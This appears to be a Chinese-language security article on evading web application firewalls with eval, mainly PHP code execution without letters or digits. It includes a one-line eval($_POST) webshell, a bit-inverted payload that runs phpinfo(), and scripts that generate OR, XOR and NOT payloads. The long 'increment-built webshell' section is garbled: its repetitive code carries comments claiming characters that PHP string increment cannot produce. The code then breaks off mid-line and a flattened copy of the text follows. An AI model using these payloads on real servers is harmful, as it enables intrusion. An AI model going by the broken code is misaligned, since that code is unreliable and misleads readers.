绕过铁waf的好手--浅谈多语言eval执行
字数 408 2025-08-22 12:22:37

多语言eval执行绕过WAF技术详解

1. eval与system函数基础

1.1 eval函数

  • 定义eval()是一个语言结构,可以执行字符串中的代码并返回执行结果
  • PHP示例
    eval($_POST[1]); // 通过POST参数执行任意代码
  • 功能
    • 执行任意代码
    • 实现变量声明和覆盖
    • 执行系统命令

1.2 system函数

  • 定义system()是一个函数,作为从语言代码执行到系统命令执行的桥梁
  • 示例
    system("whoami"); // 执行系统命令
system("php -r 'print 123;'"); // 在系统命令中执行PHP代码

2. PHP无字母数字RCE技术

2.1 基本运算绕过

  • 异或运算(^)
    $code = 'echo 5 ^ 3;'; eval($code); // 输出6
  • 取反运算(~)
    $code = 'echo ~5;'; eval($code); // 输出-6
  • 自增运算(++)
    $code = '$x = 5; $x++; echo $x;'; eval($code); // 输出6

2.2 取反编码示例

  • ~%8F%97%8F%96%91%99%90解码后执行phpinfo()
  • 当输入1=(~%8F%97%8F%96%91%99%90)();时,eval会将其运算为phpinfo();并执行

2.3 通用绕过脚本

或运算函数

function orRce($par1, $par2) {
    $result = (urldecode($par1)|urldecode($par2));
    return $result;
}

异或运算函数

function xorRce($par1, $par2) {
    $result = (urldecode($par1)^urldecode($par2));
    return $result;
}

取反运算函数

function negateRce() {
    fwrite(STDOUT,'[+]your function: ');
    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
    fwrite(STDOUT,'[+]your command: ');
    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
    echo urlencode(~$system).')(~'.urlencode(~$command);
}

生成器函数

function generate($mode, $preg='/[0-9]/i') {
    // 生成特定模式的payload
    // mode=1:或运算, mode=2:异或运算, mode=3:取反运算
}

2.4 自增构造webshell

<?php
$_=[]; // 得到"Array"
$_=$_[''=='$']; // 得到"A"
$__=$_; // $__="A"
$___=$__; // $___="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="P"
$___=$__; // $___="P"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="^"
$___=$__; // $___="^"
$__=$_; // $__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="S"
$____=$__; // $____="S"
$__=$_; // $__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="T"
$____.=$__; // $____="ST"
$__=$_; // $__="A"
$____.=$__; // $____="STA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="U"
$____.=$__; // $____="STAU"
$__=$_; // $__="A"
$____.=$__; // $____="STAUA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="V"
$____.=$__; // $____="STAUAV"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="W"
$____.=$__; // $____="STAUAVAW"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="X"
$____.=$__; // $____="STAUAVAWAX"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="Y"
$____.=$__; // $____="STAUAVAWAXAY"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="Z"
$____.=$__; // $____="STAUAVAWAXAYAZ"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="["
$____.=$__; // $____="STAUAVAWAXAYAZA["
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="\"
$____.=$__; // $____="STAUAVAWAXAYAZA[\"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="]"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="^"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="_"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="`"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="a"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`Aa"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="b"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAb"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="c"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAc"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="d"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAd"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="e"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAe"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="f"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAf"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="g"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAg"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="h"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAh"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="i"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAi"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="j"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAj"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="k"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAk"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="l"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAl"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // $__="m"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlAm"
$__=$_; // $__="A"
$____.=$__; // $____="STAUAVAWAXAYAZA[\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlAmA"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$
多语言eval执行绕过WAF技术详解 1. eval与system函数基础 1.1 eval函数 定义 : eval() 是一个语言结构,可以执行字符串中的代码并返回执行结果 PHP示例 : 功能 : 执行任意代码 实现变量声明和覆盖 执行系统命令 1.2 system函数 定义 : system() 是一个函数,作为从语言代码执行到系统命令执行的桥梁 示例 : 2. PHP无字母数字RCE技术 2.1 基本运算绕过 异或运算(^) : 取反运算(~) : 自增运算(++) : 2.2 取反编码示例 ~%8F%97%8F%96%91%99%90 解码后执行 phpinfo() 当输入 1=(~%8F%97%8F%96%91%99%90)(); 时,eval会将其运算为 phpinfo(); 并执行 2.3 通用绕过脚本 或运算函数 异或运算函数 取反运算函数 生成器函数 2.4 自增构造webshell